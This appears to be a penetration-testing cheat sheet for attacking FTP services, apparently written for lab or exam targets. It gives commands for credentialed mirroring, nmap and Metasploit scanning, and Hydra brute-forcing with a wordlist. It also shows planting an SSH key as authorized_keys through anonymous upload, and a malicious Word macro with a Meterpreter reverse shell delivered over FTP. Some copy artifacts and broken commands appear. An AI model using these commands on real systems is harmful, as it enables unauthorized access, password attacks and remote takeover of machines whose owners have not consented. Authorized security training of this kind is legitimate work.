FTP 21

checklist

• Anonymous login

• OS version

• Other software: Check Program Files, yum.log, /bin

• Password files

• DLLs: Use for msfpescan / BOF targets

• Upload potential: Do you have the ability to upload files?

• Can you trigger execution of uploads?

• Swap binaries

• Public exploits: Check for any public exploits for FTP server software

Download All Directories and Files

1. Mirror FTP directories with anonymous login:

   wget --mirror 'ftp://ftp_user:redcliff@10.10.10.59'

2. If PASV transfer is disabled:

wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'

1. If PASV is enabled:

bashCopy codesudo wget --mirror 'ftp://anonymous:anonymous@10.11.1.14'

---

FTP Information Gathering

1. Grab FTP Banner via telnet:

   telnet -n 192.168.101.100 21

2. Grab FTP Certificate if available:

   openssl s_client -connect 192.168.101.100:21 -starttls ftp

3. Nmap FTP scan:

   • Scan FTP with scripts:

     nmap --script ftp-* -p 21 192.168.101.100

   • Basic FTP scan with version detection:

     nmap -sC -sV 192.168.101.162 --script=ftp-anon

   • Alternative (without brute forcing):

     nmap -p 21 --script="+ftp and not brute and not dos and not fuzzer" -vv -oN ftp > $ip

4. Connect with Browser:

   ftp://anonymous:anonymous@192.168.101.100

---

Brute Force FTP Login

1. Hydra Brute Force (Need Username):

   hydra -t 1 -l motherfucker -P rockyou.txt -vV 192.168.101.100 ftp

2. Hydra with Sparta custom list (Requires Sparta tool):

   hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f > $ip ftp

3. Msfconsole FTP scanning:

   msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' 
   msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' 
   msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' 
   msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' 
   msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'

---

SSH Key Deployment via FTP

1. Generate SSH key:

   ssh-keygen

2. Upload SSH key via FTP:

   ftp 10.10.10.10 anonymous:anonymous
   put /root/.ssh/id_rsa.pub authorized_keys

3. SSH into target:

   ssh user@10.10.10.10

FTP Passive Mode Detection

• Passive mode at login: Indicates potential presence of a firewall in the system.

---

Exploiting MS Office Evil Macros

First Stage: Set up Reverse Shell

1. Search for Office macro:

   msfconsole --→ search office macro
   use /multi/fileformat/office_word_macro

2. Set up Meterpreter reverse listener:

   set payload windows/meterpreter/reverse_tcp
   set lhost 192.168.119.177
   set disablepayloadhandler false
   run

Second Stage: Upload and Execute Macro

1. Change file extension:

   sudo mv msf.docm msf.doc

2. Start Meterpreter listener:

   set payload windows/meterpreter/reverse_tcp
   set exitonsession false
   set lhost 192.168.119.177
   set lport 4444
   run -j

3. Upload via FTP:

   ftp 10.10.10.10 21
   put msf.doc
   exit

4. Catch Meterpreter session.